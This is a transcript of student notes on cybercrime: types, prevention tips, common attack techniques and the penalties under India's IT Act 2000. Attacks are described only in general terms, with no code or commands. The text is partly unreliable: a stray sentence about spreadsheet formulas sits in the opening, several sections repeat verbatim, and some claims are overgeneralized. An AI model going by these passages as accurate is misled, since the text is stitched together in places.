Cyber Crime Nature of Threat IT Act PDF
Document Details
Uploaded by ConsummateZither
West Bengal State University
Tags
Summary
This document discusses the nature of cybercrime, including different types of cybercrimes such as cyber terrorism, cyber extortion, cyber warfare, and internet fraud. It also examines the challenges and preventative measures associated with cybercrime, including awareness training and measures to secure data.
Full Transcript
Cyber Crime Nature of Threat IT Act Cybercrime or a computer-oriented crime is a crime that includes a computer and a network. The computer may have been used in the execution of a crime or it may be the target. Cybercrime is the use of a computer as a weapon for committing crimes such as committing...
Cyber Crime Nature of Threat IT Act Cybercrime or a computer-oriented crime is a crime that includes a computer and a network. The computer may have been used in the execution of a crime or it may be the target. Cybercrime is the use of a computer as a weapon for committing crimes such as committing fraud, identity theft, or breaching privacy. Cybercrime, especially through the Internet, has grown in importance as the computer has become central to every field like commerce, entertainment, and government. Cybercrime may endanger a person or a nation’s security and financial health. Cybercrime encloses a wide range of activities, but these can generally be divided into two categories: Crimes that aim at computer networks or devices. These types of crimes involve different threats (like virus, bugs etc.) and denial-of-service (DoS) attacks. Crimes that use computer networks to commit other criminal activities. These types of crimes include cyber stalking, financial fraud or identity theft. We separated the different arguments (or parts) in the IF formula by a Comma (,). However, we can also use the Semicolon (;) based on the language settings of the machine/ device. Classification of Cyber Crime:- Cyber Terrorism: – Cyber terrorism is the use of the computer and internet to perform violent acts that result in loss of life. This may include different type of activities either by software or hardware for threatening life of citizens. In general, Cyber terrorism can be defined as an act of terrorism committed through the use of cyberspace or computer resources. 1 Cyber Extortion: – Cyber extortion occurs when a website, e-mail server or computer system is subjected to or threatened with repeated denial of service or other attacks by malicious hackers. These hackers demand huge money in return for assurance to stop the attacks and to offer protection. Cyber Warfare: – Cyber warfare is the use or targeting in a battle space or warfare context of computers, online control systems and networks. It involves both offensive and defensive operations concerning to the threat of cyber attacks, espionage and sabotage. Internet Fraud :– Internet fraud is a type of fraud or deceit which makes use of the Internet and could include hiding of information or providing incorrect information for the purpose of deceiving victims for money or property. Internet fraud is not considered a single, distinctive crime but covers a range of illegal and illicit actions that are committed in cyberspace. Cyber Stalking :– This is a kind of online harassment wherein the victim is subjected to a barrage of online messages and emails. In this case, these stalkers know their victims and instead of offline stalking, they use the Internet to stalk. However, if they notice that cyber stalking is not having the desired effect, they begin offline stalking along with cyber stalking to make the victims’ lives more miserable. 2 Challenges in Cyber Crime:- People are unaware of their cyber rights- The Cybercrime usually happen with illiterate people around the world who are unaware about their cyber rights implemented by the government of that particular country. Anonymity:- Those who Commit cyber crime are anonymous for us so we cannot do anything to that person. Less numbers of case registered:- Every country in the world faces the challenge of cyber crime and the rate of cyber crime is increasing day by day because the people who even don’t register a case of cyber crime and this is major challenge for us as well as for authorities as well Mostly committed by well educated people:- Committing a cyber crime is not a cup of tea for every individual. The person who commits cyber crime is a very technical person so he knows how to commit the crime and not get caught by the authorities. No harsh punishment:- In Cyber crime there is no harsh punishment in every cases. But there is harsh punishment in some cases like when somebody commits cyber terrorism in that case there is harsh punishment for that individual. But in other cases there is no harsh punishment so this factor also gives encouragement to that person who commits cyber crime. Prevention of Cyber Crime:- Below are some points by means of which we can prevent cyber crime: 3 Use strong password :– Maintain different password and username combinations for each account and resist the temptation to write them down. Weak passwords can be easily cracked using certain attacking methods like Brute force attack, Rainbow table attack etc, So make them complex. That means combination of letters, numbers and special characters. Use trusted antivirus in devices: – Always use trustworthy and highly advanced antivirus software in mobile and personal computers. This leads to the prevention of different virus attack on devices. Keep social media private: – Always keep your social media accounts data privacy only to your friends. Also make sure only to make friends who are known to you. Keep your device software updated: – Whenever you get the updates of the system software update it at the same time because sometimes the previous version can be easily attacked. Use secure network: – Public Wi-Fi are vulnerable. Avoid conducting financial or corporate transactions on these networks. 4 Never open attachments in spam emails :– A computer get infected by malware attacks and other forms of cybercrime is via email attachments in spam emails. Never open an attachment from a sender you do not know. Software should be updated:– Operating system should be updated regularly when it comes to internet security. This can become a potential threat when cybercriminals exploit flaws in the system. Nature of Threat in Cyber Security:- What are Cyber Security Threat? Cybersecurity threats are acts performed by individuals with harmful intent, whose goal is to steal data, cause damage to or disrupt computing systems. Common categories of cyber threats include malware, social engineering, man in the middle (MitM) attacks, denial of service (DoS), and injection attacks—we describe each of these categories in more detail below. Cyber threats can originate from a variety of sources, from hostile nation states and terrorist groups, to individual hackers, to trusted individuals like employees or contractors, who abuse their privileges to perform malicious acts. Common Source of Cyber Attacks:- Cyber threats are getting more sophisticated and intense amid increasing levels of remote work, cloud migration and advanced cyber adversaries. Here are the biggest threats to organizations according to the Secureworks Counter Threat Unit™: 5 ▪ Ransomware remains the primary cyber threat to organizations with attack numbers rebounding and exceeding historical norms, now with a median dwell between initial access and payload delivery of just 24 hours. The top initial access vectors for ransomware include scan-and-exploit, stolen credentials, and commodity malware delivered via phishing emails. ▪ Infostealer activity has seen increased use, particularly by ransomware affiliates, and this activity is a significant precursor to ransomware attacks. These malware types steal credentials and other sensitive information, which are then sold on underground marketplaces. ▪ Business email compromise is one of the most financially damaging online crimes overall for organizations. It exceeds even ransomware in aggregate, mainly because it is so prolific, even if individual financial losses from BEC may be lower than individual losses from ransomware. ▪ Drive-by Downloads have become increasingly popular to deliver malware and as an initial access vector for malware. Two major strains of malware delivered this way are Gootloader and SocGholish, often via compromised websites. ▪ Supply chain attacks have been leveraged by various threat actors, including North Korean state-sponsored groups and ransomware operators, to gain access to the suppliers’ customers for maximize impact with minimal effort. ▪ State-sponsored threat activity continues to be driven by political imperatives, with Russia focusing on Ukraine, North Korea on currency theft, Iran on opposition suppression, and China on cyberespionage. 6 Source of Cyber Threats:- When identifying a cyber threat, it’s important to know the adversary and understand the tactics, techniques, and procedures (TTPs) associated with them. The TTPs of threat groups are constantly evolving to avoid detection, but the sources of cyber threats remain the same. There is always a human element; someone who falls for a clever trick. But more importantly, there is also always a motive. Understanding attacker TTPs helps identify the motive behind a cyber threat and act to prevent the likely next steps. The Secureworks CTU™ actively tracks threat groups and their TTPs, making those insights available to customers and using it to rapidly create countermeasures to combat the latest threats. Most Common Source of Cyber Threats:- Criminal Groups:- Use cyber threats to steal money and information, through phishing, social engineering, malicious software or other means Hackers:- Individuals, groups or organizations who compromise data for malicious intent Hacktivists:- Use cyberattacks to express social, environmental, or political agendas, often targeting corporations, governments, and other high-profile entities Insider Threats:- People who work within an organization who may intentionally or inadvertently compromise cybersecurity Corporate Spies:- Business rivals who may employ tactics to steal information or disrupt services Nation States:- Governments that use cyber threats to spy on other nations or disrupt their activities 7 Terrorist Groups:- Use cyber threats to steal information, disrupt governmental operations or spread fear Data Brokers:- Collect and sell user information without explicit consent and often through underground marketplaces Cyber Attacks Technique:- While many types of cyber attacks are possible, typical adversary attack techniques and tactics can be grouped within a matrix that includes the following categories: Initial access includes techniques used to attain a foothold within a network, like targeted spear phishing, configuration weaknesses in public-facing systems, or exploiting vulnerabilities. Command and control involve techniques leveraged by attackers to communicate with a system under their control. For example, an attacker communicating with a system over high-numbered or uncommon ports to evade detection by proxies/security appliances. Collection includes tactics used by adversaries to gather and consolidate the information they were targeting as a part of their goals. Persistence includes techniques that enable an adversary to maintain access to the target system, even following credential changes and reboots. For example, an attacker creating a scheduled task that runs their code on reboot or at a specific time. Defense evasion includes techniques used by attackers to avoid detection. These include hiding malicious code within trusted folders and processes, disabling the security software, or obfuscating adversary code. Execution involves techniques deployed to run code on a target system. For instance, an attacker running a PowerShell script to download additional attacker tools or scan other systems. 8 Discovery includes techniques used by attackers to gain information about networks and systems that they are looking to use for their tactical advantage. Credential access includes techniques deployed on networks and systems to steal usernames and credentials for reuse. Impact includes techniques leveraged by attackers to impact the availability of data, systems, and networks. It includes denial of service attacks, data or disk wiping software. Lateral movement involves tactics to enable attackers to move from one system to another within a network. Some common techniques include abuse of remote desktop protocol or pass-the-hash methods of authenticating users. Exfiltration includes tactics utilized to move data from a compromised network to a system or network that’s under the attacker’s complete control. Privilege escalation involves techniques utilized by adversaries to gain high-level privileges on a system like a root or local admin. When a criminal is trying to hack an organization, they won't try something novel unless absolutely necessary. They draw upon common hacking techniques that are known to be highly effective, such as malware or phishing. Whether you're trying to make sense of the latest data-breach headline in the news or analyzing an incident in your own organization, it helps to understand different cyberattack vectors. Malware:- Malware refers to various forms of harmful software, such as viruses and ransomware. Once it is in your computer, it can wreak all sorts of 9 havoc, from taking control of your machine, to monitoring your actions and keystrokes, to silently sending all sorts of confidential data from your computer or network to the attacker's home base. Attackers will use a variety of methods to get malware into your computer, but at some stage it often requires the user to take an action to install the malware. This can include clicking a link to download a file, or opening an email attachment that may look harmless (like a document or PDF), but actually contains a hidden malware installer. Ransomware:- Ransomware is a form of malware that encrypts data on infected IT systems. It demands a ransom in exchange for a code that will – hopefully – decrypt the infected system. The ransom payment usually goes to an anonymous address using Bitcoin. Adware:- Adware is a type of malware that displays unwanted ads on end-user devices to generate revenue from advertisers. It often will be installed on user devices after tricking people into clicking a link. Adware then displays the ads and simulates user clicks to defraud advertisers into thinking that legitimate users are interacting with their ads. They then pay the cybercriminals for these clicks. Crypto-Jacking:- Crypto-jacking is a type of malware that uses the resources of the infected IT systems to “mine” for cryptocurrencies. This steals the attacked system's computing resources by running at a high load to generate income for the remote attackers. They’ll then make money from the sale of the cryptocurrencies generated on the infected system. 10 Phishing :- In a phishing attack, an attacker may send you an email that appears to be from someone you trust, like your boss or a company you do business with. The email will seem legitimate, and it will have some urgency to it (e.g. fraudulent activity has been detected on your account). In the email, there may be an attachment to open or a link to click. Upon opening the malicious attachment, you'll unknowingly install malware in your computer. If you click the link, it may send you to a legitimate-looking website that asks you to log in to access an important file – except the website is actually a trap used to capture your credentials. Spear Phishing:- Spear phishing is a highly targeted variant of phishing that uses a fake email or message from a supposedly important individual to trick a person within the same organization or a partner organization. Spear phishing attempts hope to use the extra authenticity – albeit imposter authenticity – of the sender to trick people into providing information they shouldn't. SQL Injection Attack:- A structured query language (SQL) injection attack specifically targets servers storing critical website and service data. It uses malicious code to get the server to divulge information it normally wouldn’t. SQL is a programming language used to communicate with databases, and can be used to store private customer information such as credit card numbers, usernames and passwords (credentials), or other personally 11 identifiable information (PII) – all tempting and lucrative targets for an attacker. Cross-Site Scripting (XSS):- Cross-site scripting (XSS) attacks also involve injecting malicious code into a website, but in this case the website itself is not being attacked. Instead, the malicious code only runs in the user's browser when they visit the attacked website, where it directly targets the visitor. One of the most common ways an attacker can deploy an XSS attack is by injecting malicious code into a comment or a script that could automatically run. Botnets:- Botnets are widespread groups of devices that have been compromised and hijacked by cybercriminals. The threat actors use them to target IT systems with distributed DoS attacks or other attack types. Denial-of-Service (DoS):- Denial-of-service (DoS) attacks flood a website with more traffic than it’s built to handle, thereby overloading the site’s server and making it near-impossible to serve content to visitors. It’s possible for a denial- of-service to occur for non-malicious reasons. For example, if a massive news story breaks and a news organization’s site is overloaded with traffic from people trying to learn more about the story. Man In The Middle Attack:- A man in the middle (MITM) attack occurs when cybercriminals intercept and alter network traffic flowing between IT systems. The 12 MITM attack impersonates both senders and receivers on the network. It aims to trick both into sending unencrypted data that the attacker intercepts and can use for further attacks or financial gain. Session Hijacking:- Session hijacking occurs when an attacker hijacks a session by capturing the unique – and private – session ID and poses as the computer making a request, allowing them to log in as an unsuspecting user and gain access to unauthorized information on the web server. If everything goes as it should during any internet session, web servers should respond to your various requests by giving you the information you're attempting to access. Credential Reuse:- Credential reuse occurs when someone uses the same credentials on multiple websites. It can make life easier in the moment, but can come back to haunt that user later on. Even though security best practices universally recommend unique passwords for all applications and websites, many people still reuse their passwords. This is a fact attackers will readily exploit, thereby turning those reused passwords into compromised credentials. Not all cyber threats originate from external sources. Data and other sensitive information like login credentials can leak from inside organizations. This can occur via malicious staff activity or – more frequently – due to an unintended action. An example of such a mistake could be sending an email containing an unencrypted attachment to the wrong recipient. Cyber threats are getting more sophisticated and intense amid increasing levels of remote work, cloud migration and advanced cyber adversaries. Here 13 are the biggest threats to organizations according to the Secureworks Counter Threat Unit™: Ransomware remains the primary cyber threat to organizations with attack numbers rebounding and exceeding historical norms, now with a median dwell between initial access and payload delivery of just 24 hours. The top initial access vectors for ransomware include scan-and- exploit, stolen credentials, and commodity malware delivered via phishing emails. Infostealer activity has seen increased use, particularly by ransomware affiliates, and this activity is a significant precursor to ransomware attacks. These malware types steal credentials and other sensitive information, which are then sold on underground marketplaces. Business email compromise is one of the most financially damaging online crimes overall for organizations. It exceeds even ransomware in aggregate, mainly because it is so prolific, even if individual financial losses from BEC may be lower than individual losses from ransomware. Drive-by Downloads have become increasingly popular to deliver malware and as an initial access vector for malware. Two major strains of malware delivered this way are Gootloader and SocGholish, often via compromised websites. Supply chain attacks have been leveraged by various threat actors, including North Korean state-sponsored groups and ransomware operators, to gain access to the suppliers’ customers for maximize impact with minimal effort. State-sponsored threat activity continues to be driven by political imperatives, with Russia focusing on Ukraine, North Korea on currency theft, Iran on opposition suppression, and China on cyberespionage. When identifying a cyber threat, it’s important to know the adversary and understand the tactics, techniques, and procedures (TTPs) associated with them. The TTPs of threat groups are constantly 14 evolving to avoid detection, but the sources of cyber threats remain the same. There is always a human element; someone who falls for a clever trick. But more importantly, there is also always a motive. Understanding attacker TTPs helps identify the motive behind a cyber threat and act to prevent the likely next steps. The Secureworks CTU™ actively tracks threat groups and their TTPs, making those insights available to customers and using it to rapidly create countermeasures to combat the latest threats. Criminal Groups:- Use cyber threats to steal money and information, through phishing, social engineering, malicious software or other means Hackers:- Individuals, groups or organizations who compromise data for malicious intent Hacktivists:- Use cyberattacks to express social, environmental, or political agendas, often targeting corporations, governments, and other high-profile entities Insider Threats:- People who work within an organization who may intentionally or inadvertently compromise cybersecurity Corporate Spies:- Business rivals who may employ tactics to steal information or disrupt services Nation States:- Governments that use cyber threats to spy on other nations or disrupt their activities Terrorist Groups:- Use cyber threats to steal information, disrupt governmental operations or spread fear Data Brokers:- Collect and sell user information without explicit consent and often through underground marketplaces While many types of cyber attacks are possible, typical adversary attack techniques and tactics can be grouped within a matrix that includes the following categories: 15 Initial access includes techniques used to attain a foothold within a network, like targeted spear phishing, configuration weaknesses in public-facing systems, or exploiting vulnerabilities. Command and control involve techniques leveraged by attackers to communicate with a system under their control. For example, an attacker communicating with a system over high-numbered or uncommon ports to evade detection by proxies/security appliances. Collection includes tactics used by adversaries to gather and consolidate the information they were targeting as a part of their goals. Persistence includes techniques that enable an adversary to maintain access to the target system, even following credential changes and reboots. For example, an attacker creating a scheduled task that runs their code on reboot or at a specific time. Defense evasion includes techniques used by attackers to avoid detection. These include hiding malicious code within trusted folders and processes, disabling the security software, or obfuscating adversary code. Execution involves techniques deployed to run code on a target system. For instance, an attacker running a PowerShell script to download additional attacker tools or scan other systems. Discovery includes techniques used by attackers to gain information about networks and systems that they are looking to use for their tactical advantage. Credential access includes techniques deployed on networks and systems to steal usernames and credentials for reuse. Impact includes techniques leveraged by attackers to impact the availability of data, systems, and networks. It includes denial of service attacks, data or disk wiping software. Lateral movement involves tactics to enable attackers to move from one system to another within a network. Some common techniques include 16 abuse of remote desktop protocol or pass-the-hash methods of authenticating users. Exfiltration includes tactics utilized to move data from a compromised network to a system or network that’s under the attacker’s complete control. Privilege escalation involves techniques utilized by adversaries to gain high-level privileges on a system like a root or local admin. How to Prevent Cyberattacks:- We could cover thousands of tactics and tips for preventing cyberattacks at scale, but let's zoom in and take a look at some key examples: Phishing Awareness Training:- Educate employees on why phishing is harmful and empower them to detect and report phishing attempts. This type of training includes emailing simulated phishing campaigns to employees, monitoring results, reinforcing training, and improving on simulation results. Ongoing security awareness training for staff is also vital, so they know how to spot the most recent versions of suspicious emails, messages, or websites. Encrypt Data:- All data at rest on servers or devices and in transit over the network should be encrypted. If an attacker does get access to data or intercepts it, strong encryption should render it unreadable. 17 Compromised Credentials Detection:- Leverage user and entity behavior analytics (UBA) to create a baseline for normal activity on your network. Then, monitor how administrator and service accounts are being used, which users are inappropriately sharing credentials, and whether an attacker is already expanding from initial network compromise to move around and infiltrate other systems. Use Multi-Factor Authentication:- Implementing multi-factor authentication (MFA) for all systems is a crucial best practice. Requiring an additional piece of information in combination with a username and password protects systems if login details are exposed to cybercriminals. Additional tokens, specific device requirements, and biometrics are all examples of MFA that can be leveraged when logging into IT systems. Ransomware Prevention:- Create a three-point plan to prevent ransomware attacks. This includes minimizing an attack surface, mitigating potential impact once exposure has been detected, and debriefing to pinpoint existing plan gaps. From there, teams can rebuild systems, quarantine endpoints, change credentials, and lock compromised accounts. Use Endpoint Protection:- End-users are frequent targets for cybercriminals, both on their devices and via social-engineering attacks. All end-user devices should have endpoint security protection software deployed. This should integrate with a wider security information and event management (SIEM) tool that allows for organization-wide monitoring and analyses of threats. 18 XSS Attack Prevention:- Institute a filtering policy through which external data will pass. This will help to catch malicious scripts before they can become a problem. This leads into creating a wider content security policy that can leverage a list of trusted sources that are able to access your web applications. Threat Intelligence Program:- Create a central hub that feeds all security-organization functions with knowledge and data on the highest-priority threats. Organizations rely heavily on automation to help scale a threat intelligence program by continuously feeding data into security devices and processes, without the need for human intervention. Implement Network Deception Technologies:- Deception technologies implement onto a network “dummy” applications, databases, and other IT systems. Any cyberattackers who breach the external firewalls will be tricked into thinking they have access to internal systems. In reality, the dummy systems are intended as honeypots to allow security teams to monitor the attacker's activities and gather data without exposing the production systems. Mobile Device Management Solution:- A lot of business activity now happens on laptops, smartphones, and tablets. Plus, many people use laptops for their work. The mobile nature of all these devices means they are at high risk for being lost and/or stolen. All mobile devices (including laptops) should be enrolled and managed in a mobile device management (MDM) solution. If a 19 device is lost or stolen, it can be quickly wiped so that unauthorized users cannot access any data. IT Act:- The Information Technology Act, 2000 also Known as an IT Act is an act proposed by the Indian Parliament reported on 17th October 2000. This Information Technology Act is based on the United Nations Model law on Electronic Commerce 1996 (UNCITRAL Model) which was suggested by the General Assembly of United Nations by a resolution dated on 30th January, 1997. It is the most important law in India dealing with Cybercrime and E-Commerce. The main objective of this act is to carry lawful and trustworthy electronic, digital and online transactions and alleviate or reduce cybercrimes. The IT Act has 13 chapters and 94 sections. The last four sections that starts from ‘section 91 – section 94’, deals with the revisions to the Indian Penal Code 1860. The IT Act, 2000 has two schedules: First Schedule – Deals with documents to which the Act shall not apply. Second Schedule – Deals with electronic signature or electronic authentication method. The offences and the punishments in IT Act 2000 : The offences and the punishments that falls under the IT Act, 2000 are as follows :- 20 Tampering with the computer source documents. Directions of Controller to a subscriber to extend facilities to decrypt information. Publishing of information which is obscene in electronic form. Penalty for breach of confidentiality and privacy. Hacking for malicious purposes. Penalty for publishing Digital Signature Certificate false in certain particulars. Penalty for misrepresentation. Confiscation. Power to investigate offences. Protected System. Penalties for confiscation not to interfere with other punishments. Act to apply for offence or contravention committed outside India. Publication for fraud purposes. Power of Controller to give directions. Sections and Punishments under Information Technology Act, 2000 are as follows : Section Punishment Section 43 This section of IT Act, 2000 states that any act of destroying, altering or stealing computer system/network or deleting data with malicious intentions without authorization from owner of the computer is liable for the payment to be made to owner as compensation for damages. 21 Section 43A This section of IT Act, 2000 states that any corporate body dealing with sensitive information that fails to implement reasonable security practices causing loss of other person will also liable as convict for compensation to the affected party. Section 66 Hacking of a Computer System with malicious intentions like fraud will be punished with 3 years imprisonment or the fine of Rs.5,00,000 or both. Section 66 B,C,D Fraud or dishonesty using or transmitting information or identity theft is punishable with 3 years imprisonment or Rs. 1,00,000 fine or both. Section 66 E This Section is for Violation of privacy by transmitting image of private area is punishable with 3 years imprisonment or 2,00,000 fine or both. Section 66F This Section is on Cyber Terrorism affecting unity, integrity, security, sovereignty of India through digital medium is liable for life imprisonment. Section 67 This section states publishing obscene information or pornography or transmission of obscene content in public is liable for imprisonment up to 5 years or fine of Rs. 10,00,000 or both. 22